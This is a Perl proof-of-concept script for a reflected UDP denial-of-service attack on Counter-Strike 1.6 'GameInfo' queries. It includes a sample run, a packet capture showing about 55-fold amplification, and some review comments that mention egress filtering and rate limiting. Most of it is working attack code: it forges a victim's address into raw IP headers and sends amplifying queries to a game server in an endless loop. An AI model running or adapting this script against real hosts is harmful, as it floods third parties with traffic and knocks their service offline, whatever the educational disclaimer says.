
Counter Strike 1.6 Query Reflection DoS

  1. #!/usr/bin/perl
  2. #
  3. #  Counter-Strike 1.6 'GameInfo' Query Reflection DoS
  4. #  Proof Of Concept
  5. #
  6. #  Copyright 2015 (c) Todor Donev
  7. #  todor.donev@gmail.com
  9. #  http://www.ethical-hacker.org/
  10. #  https://www.facebook.com/ethicalhackerorg
  11. #  http://pastebin.com/u/hackerscommunity
  12. #
  13. #
  14. #  Disclaimer:
  15. #  This or previous program is for Educational
  16. #  purpose ONLY. Do not use it without permission.
  17. #  The usual disclaimer applies, especially the
  18. #  fact that Todor Donev is not liable for any
  19. #  damages caused by direct or indirect use of the
  20. #  information or functionality provided by these
  21. #  programs. The author or any Internet provider
  22. #  bears NO responsibility for content or misuse
  23. #  of these programs or any derivatives thereof.
  24. #  By using these programs you accept the fact
  25. #  that any damage (dataloss, system crash,
  26. #  system compromise, etc.) caused by the use
  27. #  of these programs is not Todor Donev's
  28. #  responsibility.
  29. #
  30. #  Use at your own risk and educational
  31. #  purpose ONLY!
  32. #
  33. #  See also, UDP-based Amplification Attacks:
  34. #  https://www.us-cert.gov/ncas/alerts/TA14-017A
  35. #
  36. #  # perl cstrike-drdos-poc.pl 46.165.194.16 192.168.1.10 27010
  37. #  [ Counter-Strike 1.6 'GameInfo' query reflection dos poc
  38. #  [ Sending GameInfo requests: 46.165.194.16 -> 192.168.1.10  
  39. #  ^C
  40. #
  41. #  # tcpdump -i eth0 -c4 port 27010
  42. #  tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
  43. #  listening on eth0, link-type EN10MB (Ethernet), capture size 65535 bytes
  44. #  00:00:00.000000 IP 192.168.1.10.31337 > masterserver.css.setti.info.27010: UDP, length 25
  45. #  00:00:00.000000 IP masterserver.css.setti.info.27010 > 192.168.1.10.31337: UDP, length 1392
  46. #  00:00:00.000000 IP 192.168.1.10.31337 > masterserver.css.setti.info.27010: UDP, length 25
  47. #  00:00:00.000000 IP masterserver.css.setti.info.27010 > 192.168.1.10.31337: UDP, length 1392
  48. #  4 packets captured
  49. #  4 packets received by filter
  50. #  0 packets dropped by kernel
  51.  
  52.  
  53. use strict;
  54. use Socket;
  55. use warnings;
  56. no warnings 'uninitialized';
  57.  
# Start-up: banner, privilege check, argument handling, raw-socket setup.
#
# The script sends Source-engine "info" queries to a game server while placing
# a third party's address in the IP source field, so the server's reply goes to
# that third party. The capture in the header comment shows a 25-byte request
# answered by a 1392-byte response. It only works from networks that let
# packets with a forged source address leave (no source-address validation /
# BCP 38 egress filtering). On the server side the usual mitigation is
# per-source rate limiting of query responses.
print "[ Counter-Strike 1.6 \'GameInfo\' query reflection dos poc\n";
# $< is the real UID; opening a raw socket below needs root.
die "[ Sorry, must be run as root. This script use RAW Socket.\n" if ($< != 0);
# Element 4 of gethostbyname's list return is the first address in packed
# (4-byte) form; both values stay undef when resolution fails.
my $css         = (gethostbyname($ARGV[0]))[4];         # Game server: used as the IP destination     (32 bits)
my $victim      = (gethostbyname($ARGV[1]))[4];         # Address written into the IP source field    (32 bits)
my $port        = $ARGV[2] || '27015';                  # UDP destination port, default 27015
# The range check runs before the usage check, so a bad port is reported even
# when the host arguments are missing.
die "[ Port must be between 1 and 65535!\n" if ($port < 1 || $port > 65535);
# Either name failing to resolve (or being absent) prints usage and exits.
if (!defined $css || !defined $victim) {
    print "[ Usg: $0 <cstrike server> <victim> <port>\n";
    print "[ Default port: 27015\n";
    print "[ <todor.donev\@gmail.com> Todor Donev\n";
    exit;
}

print "[ Sending GameInfo requests: $ARGV[0] -> $ARGV[1]\n";
# Raw IPv4 socket on the bareword handle RAW, protocol number 255; the
# subroutines below supply the IP header themselves.
socket(RAW, AF_INET, SOCK_RAW, 255)             || die $!;
# NOTE(review): level and option are given as bare numbers (0, 1) instead of
# named constants; presumably meant to enable caller-supplied IP headers, but
# the numeric option value is platform-specific -- confirm.
setsockopt(RAW, 0, 1, 1)                        || die $!;
main();
  75.  
  76.     # Main program
  77. sub main {
  78.     my $packet;
  79.      
  80.     $packet = iphdr();
  81.     $packet .= udphdr();
  82.     $packet .= cshdr();
  83.     # b000000m...
  84.     send_packet($packet);
  85. }
  86.  
# IP header (Layer 3)
#
# Returns the packed 20-byte IPv4 header as a byte string. Reads the
# file-scope $victim and $css (packed 4-byte addresses). $victim goes into the
# source-address field and $css into the destination field, so the header does
# not carry the sender's own address and the server's reply is routed to
# $victim. Networks that apply source-address validation on egress drop such
# packets.
sub iphdr {
    my $ip_ver          = 4;                                    # IP Version 4                  (4 bits)
    my $iphdr_len       = 5;                                    # IP Header Length in 32-bit words (4 bits)
    my $ip_tos          = 0;                                    # Differentiated Services       (8 bits)
    # Evaluates to 25 (5 + 20).
    # NOTE(review): this is not the byte length of the datagram main()
    # assembles; presumably the sending stack rewrites the field -- confirm.
    my $ip_total_len    = $iphdr_len + 20;                      # Total Length field           (16 bits)
    my $ip_frag_id      = 0;                                    # Identification Field         (16 bits)
    # The next two literals have leading zeros, so Perl reads them as octal;
    # both evaluate to 0 and the concatenation used in pack() is "00".
    my $ip_frag_flag    = 000;                                  # IP Frag Flags (R DF MF)       (3 bits)
    my $ip_frag_offset  = 0000000000000;                        # IP Fragment Offset           (13 bits)
    # NOTE(review): packed below through the 'h2' hex-string template, not as
    # an integer byte; confirm the on-wire TTL from a capture before treating
    # it as a detection feature.
    my $ip_ttl          = 255;                                  # IP TTL                        (8 bits)
    my $ip_proto        = 17;                                   # IP Protocol: 17 = UDP         (8 bits)
    my $ip_checksum     = 0;                                    # IP Checksum, left at zero    (16 bits)

    # IP Packet
    # Template, in order: version/IHL byte, TOS byte, total length, ID,
    # flags+offset bit string, TTL, protocol, checksum, source, destination.
        my $iphdr       = pack(
                        'H2 H2 n n B16 h2 c n a4 a4',
                        $ip_ver . $iphdr_len, $ip_tos,
                        $ip_total_len, $ip_frag_id,
                        $ip_frag_flag . $ip_frag_offset,
                        $ip_ttl, $ip_proto, $ip_checksum,
                        $victim, $css
                        );
                        return $iphdr;
}
  111.  
  112.     # UDP Header (Layer 4)
  113. sub udphdr {
  114.     my $udp_src_port    = 31337;                        # UDP Sort Port         (16 bits) (0-65535)
  115.     my $udp_dst_port    = $port;                        # UDP Dest Port         (16 btis) (0-65535)
  116.     my $udp_len         = 8 + length(cshdr());          # UDP Length            (16 bits) (0-65535)
  117.     my $udp_checksum    = 0;                            # UDP Checksum          (16 bits) (XOR of header)
  118.  
  119.     # UDP Packet
  120.     my $udphdr          = pack(
  121.                         'n n n n',
  122.                         $udp_src_port,
  123.                         $udp_dst_port,
  124.                         $udp_len,
  125.                         $udp_checksum
  126.                         );
  127.         return $udphdr;
  128. }
  129.  
  130.    # Counter-Strike 'GameInfo' request
  131. sub cshdr {
  132.  
  133. #
  134. # https://developer.valvesoftware.com/wiki/Server_queries
  135. #
  136. # https://developer.valvesoftware.com/wiki/Source_RCON_Protocol
  137. # Requests
  138. # The server responds to 5 queries:
  139. #
  140. #          A2S_INFO   'T' (0x54)
  141. #    Basic information about the server.
  142. #          A2S_PLAYER 'U' (0x55)  
  143. #    Details about each player on the server.
  144. #          A2S_RULES  'V' (0x56)
  145. #    The rules the server is using.
  146. #          A2A_PING   'i' (0x69)
  147. #    Ping the server. (DEPRECATED)
  148. # A2S_SERVERQUERY_GETCHALLENGE  'W' (0x57)
  149. #    Returns a challenge number for use in the player and rules query. (DEPRECATED)
  150. #
  151. # Queries should be sent in UDP packets to the listen port of the server.
  152. #
  153.  
  154. # 25 bytes - A2S_INFO
  155.     my $query            = "\xff\xff\xff\xff\x54";      # 0000   ff ff ff ff 54 53 6f 75 72 63 65 20 45 6e 67 69  ....TSource Engi
  156.        $query           .= "\x53\x6f\x75\x72\x63";      # 0010   6e 65 20 51 75 65 72 79 00                       ne Query.
  157.        $query           .= "\x65\x20\x45\x6e\x67";      
  158.        $query           .= "\x69\x6e\x65\x20\x51";      
  159.        $query           .= "\x75\x65\x72\x79\x00";      
  160.  
  161.     my $cshdr            = pack('a*', $query);
  162. return $cshdr;
  163. }
  164.  
  165. sub send_packet {
  166.     while(1){
  167.     select(undef, undef, undef, 0.40);                  # Sleep 400 milliseconds
  168.     send(RAW, $_[0], 0, pack('Sna4x8', AF_INET, 60, $css))  || die $!;
  169.    }
  170. }